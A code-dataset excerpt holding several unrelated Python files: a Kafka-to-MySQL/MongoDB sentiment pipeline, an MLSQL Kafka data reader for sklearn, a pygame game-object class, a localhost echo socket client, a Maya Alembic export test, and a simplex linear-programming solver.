self.mysql_client()\n sql = \"\"\"INSERT INTO sy_project_raw.aa_dws_ggyq_search_add (yqid,\n title,\n webname,\n companyName,\n cmpShortName,\n cmpCode,\n bondFull,\n bondAbbr,\n bondCode,\n firstIndustry,\n firstIndustryCode,\n secondIndustry,\n secondIndustryCode,\n threeIndustry,\n threeIndustryCode,\n firstLevelCode,\n firstLevelName,\n secondLevelCode,\n secondLevelName,\n threeLevelCode,\n threeLevelName,\n fourLevelCode,\n fourLevelName,\n eventCode,\n eventName,\n emoScore,\n emoLabel,\n emoConf,\n impScore,\n impLabel,\n srcType,\n srcUrl,\n pubTime) VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\"\"\"\n conn.insertMany(sql, result)\n conn.dispose()\n print(\"已存入--aa_dws_ggyq_search_add\")\n def mysql_insert_u_yuqing(self,result):\n \"\"\"\n 储存数据 舆情表\n :param result:\n :return:\n \"\"\"\n conn = self.mysql_client()\n sql = \"\"\"INSERT INTO sy_project_raw.dwa_me_yq_search_add (yqid,\n objName,\n companyShortName,\n companyCode,\n indirectObjName,\n transScore,\n relPath,\n relType,\n relScore,\n relLabel,\n personName,\n eventCode,\n eventName,\n firstLevelCode,\n firstLevelName,\n secondLevelCode,\n secondLevelName,\n thirdLevelCode,\n thirdLevelName,\n fourthLevelCode,\n fourthLevelName,\n emoLabel,\n emoScore,\n emoConf,\n impScore,\n impLabel,\n pubTime,\n title,\n summary,\n keyword,\n srcUrl,\n srcType,\n source,\n content) VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\"\"\"\n conn.insertMany(sql, result)\n conn.dispose()\n print(\"已存入--dwa_me_yq_search_add\")\n def mongo_date(self):\n \"\"\"\n 组成mongo所需要的的字典\n :return:\n \"\"\"\n dateArray = datetime.datetime.fromtimestamp(time.time())\n otherStyleTime = dateArray.strftime(\"%Y-%m-%d %H:%M:%S\")\n transScore = \"\"\n relPath = \"\"\n personName = \"\"\n relType = \"直接关联\"\n summary = \"\"\n keyword = \"\"\n content = \"\"\n relScore = \"\"\n relLabel = \"\"\n self.emolabel = self.emoLabel_i()\n self.impLabel = self.impLabel_i()\n self.mydict[\"onlyId\"] = self.onlyId\n self.mydict[\"yqid\"] = self.yqid\n self.mydict[\"objName\"] = self.companyName\n self.mydict[\"companyShortName\"] = self.cmpShortName\n self.mydict[\"companyCode\"] = self.cmpCode\n self.mydict[\"indirectObjName\"] = self.companyName\n self.mydict[\"transScore\"] = transScore\n self.mydict[\"relPath\"] = relPath\n self.mydict[\"relType\"] = relType\n self.mydict[\"relScore\"] = relScore\n self.mydict[\"relLabel\"] = relLabel\n self.mydict[\"personName\"] = personName\n self.mydict[\"eventCode\"] = self.eventCode\n self.mydict[\"eventName\"] = self.eventName\n self.mydict[\"firstLevelCode\"] = self.firstLevelCode\n self.mydict[\"firstLevelName\"] = self.firstLevelName\n self.mydict[\"secondLevelCode\"] = self.secondLevelCode\n self.mydict[\"secondLevelName\"] = self.secondLevelName\n self.mydict[\"thirdLevelCode\"] = self.threeLevelCode\n self.mydict[\"thirdLevelName\"] = self.threeLevelName\n self.mydict[\"fourthLevelCode\"] = self.fourLevelCode\n self.mydict[\"fourthLevelName\"] = self.fourLevelName\n self.mydict[\"emoLabel\"] = self.emolabel\n self.mydict[\"emoScore\"] = self.emoScore\n self.mydict[\"emoConf\"] = self.emoConf\n self.mydict[\"impScore\"] = self.impScore\n self.mydict[\"impLabel\"] = self.impLabel\n self.mydict[\"pubTime\"] = self.pubTime\n self.mydict[\"title\"] = self.title\n self.mydict[\"summary\"] = summary\n self.mydict[\"keyword\"] = keyword\n self.mydict[\"srcUrl\"] = self.srcUrl\n self.mydict[\"srcType\"] = self.srcType\n self.mydict[\"source\"] = self.webname\n self.mydict[\"content\"] = content\n self.mydict[\"isValid\"] = 1\n self.mydict[\"dataStatus\"] = 1\n self.mydict[\"createTime\"] = otherStyleTime\n self.mydict[\"modifyTime\"] = otherStyleTime\n def mongo_insert(self):\n \"\"\"\n 将数据储存在mongo中\n :return:\n \"\"\"\n mydb = self.myclient[\"sy_project_raw\"]\n mycol = mydb[\"dwa_me_yq_search\"]\n self.onlyId = self.add_uuid(self.yqid+self.companyName+str(self.eventCode))\n self.mongo_date()\n print(self.mydict)\n my_dict_new = {}\n try:\n my_dict_new.update(self.mydict)\n mycol.insert(my_dict_new)\n except:\n print(\"重复\")\n print(\"保存mongo数据一份\")\n\ndef main():\n \"\"\"\n 启动方法并处理准备参数\n :return:\n \"\"\"\n kafka_losd = Kafka_consumer_s()\n kafka_losd.kafka_take_out()\nif __name__ == '__main__':\n main()\n\n","sub_path":"kafka_stream/kafka_a.py","file_name":"kafka_a.py","file_ext":"py","file_size_in_byte":28312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"137612140","text":"# pylint: disable=protected-access\nfrom __future__ import absolute_import, division, print_function\nimport os\nimport sys\nimport gc\nimport uuid\nimport time\nimport io\nimport multiprocessing\nfrom kafka import KafkaConsumer\nimport msg_queue\n\nif sys.version < '3':\n import cPickle as pickle\nelse:\n import pickle\n\n unicode = str\n\n\ndef dump(value, f):\n try:\n pickle.dump(value, f, 2)\n except pickle.PickleError:\n raise\n except Exception as e:\n msg = \"Could not serialize broadcast: %s\" \\\n % (e.message)\n sys.stderr\n raise pickle.PicklingError(msg)\n f.close()\n return f.name\n\n\ndef load(path):\n try:\n with open(path, 'rb', 1 << 20) as f:\n # pickle.load() may create lots of objects, disable GC\n # temporary for better performance\n gc.disable()\n try:\n return pickle.load(f)\n finally:\n gc.enable()\n except Exception:\n return []\n\n\nfilename = os.path.join(os.getcwd(), \"python_temp.pickle\")\n_params = load(\"{}\".format(filename))\nprint(\"params from parent: {}\".format(_params))\n\nif \"kafkaParam\" in _params:\n kafka_param = _params[\"kafkaParam\"]\n\nif \"fitParam\" in _params:\n fit_param = _params[\"fitParam\"]\n\nif \"internalSystemParam\" in _params:\n internal_system_param = _params[\"internalSystemParam\"]\n\nif \"systemParam\" in _params:\n systemParam = _params[\"systemParam\"]\n\nvalidate_table_filename = os.path.join(os.getcwd(), \"validate_table.pickle\")\nraw_validate_data = load(validate_table_filename)\nvalidate_data = []\nfor item in raw_validate_data:\n with io.BytesIO(item) as f:\n msg = pickle.load(f)\n validate_data.append(msg)\n\n\ndef read_data():\n # Update params\n # os.environ.get('pickleFile')\n if \"debug\" in kafka_param and kafka_param[\"debug\"]:\n import logging\n logging.basicConfig(level=logging.DEBUG)\n\n authkey = uuid.uuid4().bytes\n mgr = msg_queue.start(authkey=authkey, queue_max_size=10, queues=['input'])\n\n def from_kafka(args, mgr):\n consumer = KafkaConsumer(kafka_param[\"topic\"],\n group_id=kafka_param[\"group_id\"],\n bootstrap_servers=kafka_param[\"bootstrap.servers\"],\n auto_offset_reset=\"earliest\",\n enable_auto_commit=False\n )\n\n max_records = args[\"max_records\"]\n no_message_count = 0\n no_message_time = 5\n try:\n stop_count = 0\n fail_msg_count = 0\n while True:\n messages = consumer.poll(timeout_ms=1000, max_records=max_records)\n queue = mgr.get_queue(\"input\")\n group_msgs_count = 0\n group_msgs = []\n for tp, records in messages.items():\n for record in records:\n try:\n with io.BytesIO(record.value) as f:\n msg_value = pickle.load(f)\n if msg_value == \"_stop_\":\n stop_count += 1\n else:\n group_msgs.append(msg_value)\n group_msgs_count += 1\n except:\n fail_msg_count += 0\n print(\"unpickle from kafka fail\")\n sys.stdout.flush()\n pass\n if len(group_msgs) > 0:\n no_message_count = 0\n queue.put(group_msgs, block=True)\n\n if len(group_msgs) == 0 and no_message_count < 10:\n time.sleep(no_message_time)\n no_message_count += 1\n\n if (stop_count >= internal_system_param[\"stopFlagNum\"] and group_msgs_count == 0) or (\n no_message_count >= 10 and group_msgs_count == 0):\n queue.put([\"_stop_\"], block=True)\n print(\n \"no message from kafka, send _stop_ message. no_message_count={},stop_count={},stopFlagNum={}\".format(\n no_message_count, stop_count, internal_system_param[\"stopFlagNum\"]))\n sys.stdout.flush()\n break\n finally:\n consumer.close()\n\n def _read_data(max_records=64, consume_threads=1, print_consume_time=False):\n\n def asyn_produce(consume_threads=1):\n print(\"asyn_produce start consuming\")\n x = 0\n while x < consume_threads:\n x += 1\n process = multiprocessing.Process(target=from_kafka, args=({\"max_records\": max_records}, mgr))\n process.start()\n\n def sync_produce(consume_threads=1):\n import threading\n x = 0\n while x < consume_threads:\n x += 1\n print(\"sync_produce start consuming\")\n threading.Thread(target=from_kafka, args=({\"max_records\": max_records}, mgr)).start()\n\n if \"useThread\" in systemParam:\n sync_produce(consume_threads=consume_threads)\n else:\n asyn_produce(consume_threads=consume_threads)\n\n print(\"start consuming from queue\")\n queue = mgr.get_queue(\"input\")\n\n def now_time():\n return int(round(time.time() * 1000))\n\n leave_msg_group = []\n total_wait_count = 0\n while True:\n msg_group = []\n count = 0\n should_break = False\n\n if print_consume_time:\n start_time = now_time()\n wait_count = 0\n while count < max_records:\n if queue.empty():\n wait_count += 1\n total_wait_count += 1\n items = queue.get(block=True)\n if items[-1] == \"_stop_\":\n should_break = True\n break\n items = items + leave_msg_group\n leave_msg_group = []\n items_size = len(items)\n\n if items_size == max_records:\n msg_group = items\n break\n if items_size > max_records:\n msg_group = items[0:max_records]\n leave_msg_group = items[max_records:items_size]\n break\n if items_size < max_records:\n leave_msg_group = leave_msg_group + items\n count += 1\n\n if len(leave_msg_group) > 0:\n msg_group = leave_msg_group\n\n if wait_count > 1 and total_wait_count < 11:\n print(\"queue get blocked count:{} when batch size is:{} actually size is {}\".format(wait_count,\n max_records,\n len(msg_group)))\n if total_wait_count == 10:\n print(\"already print too many blocked count(maybe kafka is busy)\")\n\n if print_consume_time:\n ms = now_time() - start_time\n print(\"queue fetch {} consume:{}\".format(max_records, ms))\n sys.stdout.flush()\n yield msg_group\n if should_break:\n print(\"_stop_ msg received, All data consumed.\")\n break\n queue.task_done()\n\n return _read_data\n\n\ndef params():\n return _params\n\n\ndef sklearn_configure_params(clf):\n fitParams = params()[\"fitParam\"]\n\n def t(v, convert_v):\n if type(v) == float:\n return float(convert_v)\n elif type(v) == int:\n return int(convert_v)\n elif type(v) == list:\n if type(v[0]) == int:\n return [int(i) for i in v]\n if type(v[0]) == float:\n return [float(i) for i in v]\n return v\n else:\n return convert_v\n\n for name in clf.get_params():\n if name in fitParams:\n dv = clf.get_params()[name]\n setattr(clf, name, t(dv, fitParams[name]))\n\n\ndef sklearn_all_data():\n rd = read_data()\n fitParams = params()[\"fitParam\"]\n X = []\n y = []\n x_name = fitParams[\"inputCol\"] if \"inputCol\" in fitParams else \"features\"\n y_name = fitParams[\"label\"] if \"label\" in fitParams else \"label\"\n debug = \"debug\" in fitParams and bool(fitParams[\"debug\"])\n counter = 0\n for items in rd(max_records=1000):\n item_size = len(items)\n if debug:\n counter += item_size\n print(\"{} collect data from kafka:{}\".format(fitParams[\"alg\"], counter))\n if item_size == 0:\n continue\n X = X + [item[x_name].toArray() for item in items]\n y = y + [item[y_name] for item in items]\n return X, y\n\n\ndef _get_param(p, name, default_value):\n return p[name] if name in p else default_value\n\n\ndef get_param(p, name, default_value):\n return _get_param(p, name, default_value)\n\n\ndef get_validate_data():\n X = []\n y = []\n fitParams = params()[\"fitParam\"]\n x_name = fitParams[\"inputCol\"] if \"inputCol\" in fitParams else \"features\"\n y_name = fitParams[\"label\"] if \"label\" in fitParams else \"label\"\n for item in validate_data:\n X.append(item[x_name].toArray())\n y.append(item[y_name])\n return X, y\n\n\ndef sklearn_batch_data(fn):\n rd = read_data()\n fitParams = params()[\"fitParam\"]\n batch_size = int(_get_param(fitParams, \"batchSize\", 1000))\n label_size = int(_get_param(fitParams, \"labelSize\", -1))\n x_name = _get_param(fitParams, \"inputCol\", \"features\")\n y_name = _get_param(fitParams, \"label\", \"label\")\n for items in rd(max_records=batch_size):\n if len(items) == 0:\n continue\n X = [item[x_name].toArray() for item in items]\n y = [item[y_name] for item in items]\n fn(X, y, label_size)\n","sub_path":"streamingpro-mlsql/src/main/resources-online/python/mlsql.py","file_name":"mlsql.py","file_ext":"py","file_size_in_byte":10067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"291639193","text":"import pygame\nimport random\nimport string\n\nfrom core.state.state import State\nfrom core.ui.state.ui_state import UIState\n\n\nclass GameObject:\n \"\"\"\n 组件与状态混用\n \"\"\"\n def __init__(self, x, y, z=0):\n self.surface = pygame.Surface((0, 0))\n self.id = ''.join(random.sample(string.ascii_letters, 10))\n\n self.parent = None\n self.children = []\n\n self.res_info = None\n\n self.x = x # GameObject关键点 X\n self.y = y # GameObject关键点 Y\n self.z = z # GameObject Z序\n self.z_index = 0\n\n self.state = None\n\n self.inited = False\n self.ready = False\n\n def handle_event(self, event):\n self.state.handle_event(event)\n\n def early_update(self, context):\n if self.inited:\n self.state.early_update(context)\n\n def update(self, context):\n if self.inited:\n self.state.update(context)\n\n def late_update(self, context):\n if self.inited:\n self.state.late_update(context)\n\n def draw(self, screen):\n if self.ready:\n self.state.draw(screen)\n\n def late_draw(self, screen):\n if self.ready:\n self.state.late_draw(screen)\n\n def get_xy(self):\n return self.x, self.y\n\n def init_state(self, state):\n if isinstance(state, State) or isinstance(state, UIState): # 如果是State实例\n self.state = state\n self.state.register(self)\n self.state.enter()\n\n def changing_state(self, next_state, context=None, force=False):\n if not force and isinstance(next_state, type(self.state)):\n return\n self.state.exit()\n self.init_state(next_state)\n if context:\n self.state.update(context)\n\n def add_child(self, child):\n child.parent = self\n while hasattr(self, child.id): # 如果child id已经在self这里重复,则重新随机child id\n child.id = ''.join(random.sample(string.ascii_letters, 10))\n self.__setattr__(child.id, child)\n child.z = self.z_index\n self.z_index += 1\n self.children.append(child)\n\n def destroy(self):\n for child in self.children:\n child.destroy()\n self.children = []\n\n self.state.destroy()\n self.state = None\n\n if self.parent:\n i = 0\n for me_or_brothers in self.parent.children:\n if me_or_brothers.id == self.id:\n break\n i += 1\n del self.parent.children[i]\n self.parent.__delattr__(self.id)\n self.parent = None\n\n self.surface = None\n\n def empty_children(self):\n self.children.clear()\n","sub_path":"core/entity/game_object.py","file_name":"game_object.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"201663343","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n@file: echoClient.py\n@time: 2020/11/30 下午2:18\n@author: shenpinggang\n@contact: 1285456152@qq.com\n@desc: \n\"\"\"\nimport socket\n\n\nclass Client(object):\n\n def __init__(self, address, port):\n self.address = address\n self.port = port\n\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.connect((self.address, self.port))\n\n def send(self, message):\n self.sock.sendall(message.encode())\n\n def receive(self):\n data = self.sock.recv(1024)\n return data.decode('utf-8')\n\n def close(self):\n self.sock.close()\n\n\ndef my_client(address, port):\n client = Client(address, port)\n while True:\n message = input(\"Input >\")\n\n if message == 'exit':\n client.send(message)\n break\n\n client.send(message)\n info = client.receive()\n print(info)\n\n client.close()\n\n\nif __name__ == '__main__':\n my_client(\"127.0.0.1\", 8888)\n","sub_path":"week02/echo/echoClient.py","file_name":"echoClient.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"517331185","text":"##-*****************************************************************************\n##\n## Copyright (c) 2009-2011,\n## Sony Pictures Imageworks, Inc. and\n## Industrial Light & Magic, a division of Lucasfilm Entertainment Company Ltd.\n##\n## All rights reserved.\n##\n## Redistribution and use in source and binary forms, with or without\n## modification, are permitted provided that the following conditions are\n## met:\n## * Redistributions of source code must retain the above copyright\n## notice, this list of conditions and the following disclaimer.\n## * Redistributions in binary form must reproduce the above\n## copyright notice, this list of conditions and the following disclaimer\n## in the documentation and/or other materials provided with the\n## distribution.\n## * Neither the name of Sony Pictures Imageworks, nor\n## Industrial Light & Magic nor the names of their contributors may be used\n## to endorse or promote products derived from this software without specific\n## prior written permission.\n##\n## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n## \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n##\n##-*****************************************************************************\n\nfrom maya import cmds as MayaCmds\nimport os\nimport unittest\nimport util\n\ndef makeRobot():\n MayaCmds.polyCube(name=\"head\")\n MayaCmds.move(0, 4, 0, r=1)\n\n MayaCmds.polyCube(name=\"chest\")\n MayaCmds.scale(2, 2.5, 1)\n MayaCmds.move(0, 2, 0, r=1)\n MayaCmds.polyCube(name=\"leftArm\")\n MayaCmds.move(0, 3, 0, r=1)\n MayaCmds.scale(2, 0.5, 1, r=1)\n MayaCmds.duplicate(name=\"rightArm\")\n MayaCmds.select(\"leftArm\")\n MayaCmds.move(1.25, 0, 0, r=1)\n MayaCmds.rotate(0, 0, 32, r=1, os=1)\n MayaCmds.select(\"rightArm\")\n MayaCmds.move(-1.25, 0, 0, r=1)\n MayaCmds.rotate(0, 0, -32, r=1, os=1)\n MayaCmds.select(\"rightArm\", \"leftArm\", \"chest\", r=1)\n MayaCmds.group(name=\"body\")\n\n MayaCmds.polyCube(name=\"bottom\")\n MayaCmds.scale(2, 0.5, 1)\n MayaCmds.move(0, 0.5, 0, r=1)\n MayaCmds.polyCube(name=\"leftLeg\")\n MayaCmds.scale(0.65, 2.8, 1, r=1)\n MayaCmds.move(-0.5, -1, 0, r=1)\n MayaCmds.duplicate(name=\"rightLeg\")\n MayaCmds.move(1, 0, 0, r=1)\n MayaCmds.select(\"rightLeg\", \"leftLeg\", \"bottom\", r=1)\n MayaCmds.group(name=\"lower\")\n\n MayaCmds.select(\"head\", \"body\", \"lower\", r=1)\n MayaCmds.group(name=\"robot\")\n\nclass selectionTest(unittest.TestCase):\n\n def setUp(self):\n MayaCmds.file(new=True, force=True)\n self.__files = []\n\n def tearDown(self):\n for f in self.__files:\n os.remove(f)\n\n def testWriteMultipleRoots(self):\n\n makeRobot()\n MayaCmds.duplicate(\"robot\", name=\"dupRobot\")\n self.__files.append(util.expandFileName('writeMultipleRootsTest.abc'))\n MayaCmds.AbcExport(j='-root dupRobot -root head -root lower -root chest -file ' + self.__files[-1])\n\n MayaCmds.AbcImport(self.__files[-1], m='open')\n self.failUnless(MayaCmds.objExists(\"dupRobot\"))\n self.failUnless(MayaCmds.objExists(\"head\"))\n self.failUnless(MayaCmds.objExists(\"lower\"))\n self.failUnless(MayaCmds.objExists(\"chest\"))\n\n self.failIf(MayaCmds.objExists(\"robot\"))\n self.failIf(MayaCmds.objExists(\"robot|body\"))\n","sub_path":"Engine/Plugins/Experimental/AlembicImporter/Source/ThirdParty/Alembic/alembic/maya/Tests/AbcExport_writeMultipleRoots.py","file_name":"AbcExport_writeMultipleRoots.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"638629842","text":"import numpy as np\n\n# or-tools convention\nstatus2str = [\"OPTIMAL\", \"FEASIBLE\", \"INFEASIBLE\", \"UNBOUNDED\", \n \"ABNORMAL\", \"MODEL_INVALID\", \"NOT_SOLVED\"]\n\ndebug = False\ndef dbg(s0, *s):\n if debug:\n print(s0, *s)\n\ndef pivot(T, pc, pr):\n #print(\"pc:\", pc, \"pr:\", pr)\n pe = T[pr, pc] # pivot element\n pivot_row = T[pr, :] * 1.0 # stupid numpy copy gotcha\n pivot_row /= pe\n offset = np.dot(T[:, pc].reshape([-1, 1]), pivot_row.reshape([1, -1]))\n T -= offset\n T[pr, :] = pivot_row\n return T\n\n\ndef select_pivot_column(z):\n \"\"\"\n Pick one variable that increases the objective\n \"\"\"\n\n for i, zi in enumerate(z):\n if zi > 0:\n return i + 1\n else:\n return None\n\n\ndef select_pivot_row(Tc, b):\n \"\"\"\n Which ceiling are we going to hit our head in first?\n \"\"\"\n\n #print(Tc)\n if all(Tc <= 0): # no roof over our head - to the stars!\n return None\n\n ratios = [bi / Tci if Tci > 0 else np.inf for Tci, bi in zip(Tc, b)]\n #print(\"ratios:\", ratios)\n return np.argmin(ratios) + 1\n\n\ndef collect_solution(T, basic):\n num_slack = len(basic)\n num_vars = len(T[0]) - num_slack - 2\n b = T[1:, -1]\n\n solution = np.zeros([num_vars])\n\n for pr, pc in enumerate(basic):\n if pc <= num_slack: # is a slack variable\n continue\n\n solution[pc - num_slack - 1] = T[pr + 1, -1] / T[pr + 1, pc]\n\n return solution\n\n\ndef phase2(A, b, c):\n \"\"\"\n maximize c * x \n such that\n Ax <= b\n x >= 0\n b >= 0\n \"\"\"\n\n # build a tableau T\n #T = [1 -c 0 0;\n # 0 A I b]\n # where I corresponds to s, slack variables\n\n # Loop, terminate when no pivot column can be selected\n\n # select pivot column\n # given pivot column, select pivot row\n # given pivot element, perform pivot operation\n\n # need to keep track of:\n # which variables are basic\n\n # returning the solution: identify basic variables among original variables\n # set nonbasic variables to 0\n\n num_slack, num_vars = A.shape\n z_s0 = np.zeros([num_slack])\n z_s1 = np.zeros([num_slack, 1])\n\n T1 = np.hstack([np.array([1]), z_s0, c, np.array([0])])\n T2 = np.hstack([z_s1, np.eye(num_slack), A, b])\n T = np.vstack([T1, T2])\n\n #dbg(T)\n\n basic = list(range(num_slack))\n\n while True:\n pc = select_pivot_column(T[0, 1:])\n if pc is None: # found optimum\n break\n #print(\"pc:\", pc)\n\n pr = select_pivot_row(T[1:, pc], T[1:, -1])\n if pr is None: # unbounded\n return None, np.inf\n #print(\"pr:\", pr)\n\n T = pivot(T, pc, pr)\n #print(T)\n\n basic[pr - 1] = pc\n\n return collect_solution(T, basic), -T[0, -1]\n\ndef phase1(A, b, c):\n \"\"\"\n find a feasible solution to \n Ax <= b\n x >= 0\n \"\"\"\n\n num_constr, num_vars = A.shape\n I = np.eye(num_constr)\n\n c_ext = np.concatenate([np.zeros([num_vars]), -1 * np.ones([num_constr])])\n A_ext = np.hstack([A, -I])\n z_init = -b * (b < 0)\n dbg(\"z_init:\\n\", z_init)\n x_relaxed = np.concatenate([np.zeros([num_vars, 1]), z_init])\n dbg(\"x_relaxed:\\n\", x_relaxed)\n A_prim, b_prim, c_prim, d_prim = phase1_5(A_ext, b, c_ext, x_relaxed)\n #c_prim[-len(c_prim) // 2:] = 0\n dbg(\"A_prim:\\n\", A_prim)\n dbg(\"b_prim:\\n\", b_prim)\n dbg(\"c_prim:\\n\", c_prim)\n dbg(\"d_prim:\\n\", d_prim)\n\n x_bfs, val = phase2(A_prim, b_prim, c_prim)\n\n dbg(\"x_bfs:\", x_bfs, \"val:\", val, \"d:\", d_prim)\n #exit(0)\n\n # c_ext * [0 z] = c_prim * x_bfs + d_prim = val + d_prim\n\n tol = 1e-8\n if val + d_prim < -tol: # infeasible\n return None\n\n return x_bfs[:num_vars]\n\ndef phase1_5(A, b, c, x_bfs):\n \"\"\"\n Given a basic feasible solution x_bfs,\n perform variable substitution so that\n \n A'x' <= b'\n x' >= 0\n b' >= 0.\n\n Also transform c to c' and add constant d, \n to preserve optimum.\n\n A' = [A, -A;\n 0, I]\n b' = [b - A*x_bfs;\n x_bfs]\n c' = [c, -c]\n d = c*x_bfs.\n\n Effectively what we're doing is renaming\n\n x = x_positive - x_negative + x_bfs\n x_positive, x_negative >= 0\n where \n x >= 0 -> x_positive - x_negative + x_bfs ->\n -x_positive + x_negative <= x_bfs -> x_negative <= x_bfs\n\n also\n Ax <= b -> A(x_positive - x_negative + x_bfs) <= b ->\n [A, -A] * [x_positive; x_negative] <= b\n\n \"\"\" \n\n num_constr, num_vars = A.shape\n\n y_bfs = np.dot(A, x_bfs).reshape([-1, 1])\n dbg(\"y_bfs:\", y_bfs)\n b_prim = b - y_bfs\n dbg(\"b_prim:\", b_prim)\n b_prim = np.vstack([b_prim, x_bfs.reshape([-1, 1])])\n dbg(\"b_prim:\", b_prim)\n\n A_prim = np.hstack([A, -A])\n I = np.eye(num_vars)\n I_prim = np.hstack([-I, I])\n A_prim = np.vstack([A_prim, I_prim])\n\n c_prim = np.hstack([c, -c])\n d = np.dot(c, x_bfs)\n\n return A_prim, b_prim, c_prim, d\n\n\ndef lp(A, b, c):\n \"\"\"\n maximize c * x \n such that\n Ax <= b\n x >= 0\n \"\"\"\n\n num_constr, num_vars = A.shape\n\n x_bfs = phase1(A, b, c)\n if x_bfs is None:\n return None, None, 2 # infeasible\n\n dbg(\"x_bfs:\", x_bfs)\n\n dbg(\"b\", b)\n A, b, c, d = phase1_5(A, b, c, x_bfs)\n dbg(A)\n dbg(b)\n dbg(c)\n dbg(d)\n\n x_opt, val = phase2(A, b, c)\n if x_opt is None:\n return None, np.inf, 3 # unbounded\n\n x_opt = x_opt[:num_vars] - x_opt[-num_vars:]\n x_opt = x_opt + x_bfs\n return x_opt, val, 0 # optimal\n\n\ndef main():\n global debug\n debug = False\n\n all_tests = [\"basic\", \"basic_2\", \"basic_3\",\n \"basic_4\", \"basic_5\", \"basic_6\"\n \"infeasible\", \"infeasible_2\",\n \"unbounded\"]\n\n test_cases = [\"basic_6\"]\n\n if \"basic\" in test_cases:\n A = np.array([[2, 1], [1, 2]])\n b = np.array([[1], [1]])\n c = np.array([1, 1])\n print(\"Should be OPTIMAL\")\n x_opt, opt_val, status = lp(A, b, c)\n print(x_opt, opt_val, status2str[status])\n\n if \"basic_2\" in test_cases:\n A = np.array([[2, 1], [1, 2], [4, 4]])\n b = np.array([[1], [1], [1]])\n c = np.array([1, 1])\n print(\"Should be OPTIMAL\")\n x_opt, opt_val, status = lp(A, b, c)\n print(x_opt, opt_val, status2str[status])\n\n if \"basic_3\" in test_cases:\n A = np.array([[2, 1], [1, 2], [-2, -2]])\n b = np.array([[1], [1], [-1]])\n c = np.array([1, 1])\n print(\"Should be OPTIMAL\")\n x_opt, opt_val, status = lp(A, b, c)\n print(x_opt, opt_val, status2str[status])\n\n if \"basic_4\" in test_cases:\n A = np.array([[3, 1], [1, 3], [2, 3]])\n b = np.array([[1], [1], [1]])\n c = np.array([1, 1])\n print(\"Should be OPTIMAL\")\n x_opt, opt_val, status = lp(A, b, c)\n print(x_opt, opt_val, status2str[status])\n\n if \"basic_5\" in test_cases:\n # this should take just two pivots\n A = np.array([[-1, 1], [1, -1], [1, 1]])\n b = np.array([[1], [1], [10000000]])\n c = np.array([1, 1])\n print(\"Should be OPTIMAL\")\n x_opt, opt_val, status = lp(A, b, c)\n print(x_opt, opt_val, status2str[status])\n\n if \"basic_6\" in test_cases:\n A = np.array([[-1, 1], [1, -1], [1, 1]])\n b = np.array([[1], [1], [1]])\n c = np.array([1, 1])\n print(\"Should be OPTIMAL\")\n x_opt, opt_val, status = lp(A, b, c)\n print(x_opt, opt_val, status2str[status])\n\n\n if \"infeasible\" in test_cases:\n A = np.array([[2, 1], [1, 2], [1, 1]])\n b = np.array([[1], [1], [-1]])\n c = np.array([1, 1])\n print(\"Should be INFEASIBLE\")\n x_opt, opt_val, status = lp(A, b, c)\n print(x_opt, opt_val, status2str[status])\n\n if \"infeasible_2\" in test_cases:\n A = np.array([[2, 1], [1, 2], [-1, -1]])\n b = np.array([[1], [1], [-1]])\n c = np.array([1, 1])\n print(\"Should be INFEASIBLE\")\n x_opt, opt_val, status = lp(A, b, c)\n print(x_opt, opt_val, status2str[status])\n\n if \"unbounded\" in test_cases:\n A = np.array([[-1, -1]])\n b = np.array([[-1]])\n c = np.array([1, 1])\n print(\"Should be UNBOUNDED\")\n x_opt, opt_val, status = lp(A, b, c)\n print(x_opt, opt_val, status2str[status])\n\n\nif __name__ == '__main__':\n main()","sub_path":"garageofcode/simplex/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"67867247","text":"#!/usr/bin/python\n\nimport json, sys, math\nfrom math import sin, cos, sqrt, atan2, radians\nfrom exifParser import exifParse\n\n# Files\nfname = \"FilteredLocationHistory.json\"\noutName = 'aggregate.json'\nchapterFName = \"chapters.json\"\nimageMetadataFileName = \"image_metadata.json\"\nimg_dir = \"../../public/\" # Enter Directory of all images \n\n# Runtime constants\naggregateDistance = 1.0 # Aggregate locations less than 1 km apart\naggregateMinimum = 80 # Minimum of 80 data entries to keep\nfurtherAggregateDistance = 1.0 #Area aggregate\n\n# Points east of this median will be displayed west of the western hemisphere.\n# I want East Asia displayed across the Pacific :)\nflipMedianDegree = 50\n\n\n\n# CONSTANTS\nR = 6373.0 # 